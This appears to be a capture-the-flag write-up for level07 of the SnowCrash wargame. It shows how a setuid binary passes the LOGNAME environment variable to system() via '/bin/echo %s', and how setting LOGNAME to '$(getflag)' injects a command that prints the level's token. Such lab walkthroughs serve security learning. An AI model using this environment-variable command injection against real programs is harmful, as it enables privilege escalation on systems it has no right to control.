# Level07

- So here we have an executable:
	```bash
	level07@SnowCrash:~$ nm -u level07
	         w _Jv_RegisterClasses
	         w __gmon_start__
	         U __libc_start_main@@GLIBC_2.0
	         U asprintf@@GLIBC_2.0
	         U getegid@@GLIBC_2.0
	         U getenv@@GLIBC_2.0
	         U geteuid@@GLIBC_2.0
	         U setresgid@@GLIBC_2.0
	         U setresuid@@GLIBC_2.0
	         U system@@GLIBC_2.0
	```
- And in the strings:
	```bash
	level07@SnowCrash:~$ strings level07
	[...]
	LOGNAME
	[...]
	/bin/echo %s
	[...]
	```
- So it seems it reads the environement looking for an LOGNAME variable
	and executes it as a shell command. We just have to create that variable:
	```bash
	level07@SnowCrash:~$ LOGNAME='$(getflag)'
	```
- And bam:
	```bash
	level07@SnowCrash:~$ ./level07
	Check flag.Here is your token : fiumuikeil55xe9cu4dood66h
	```
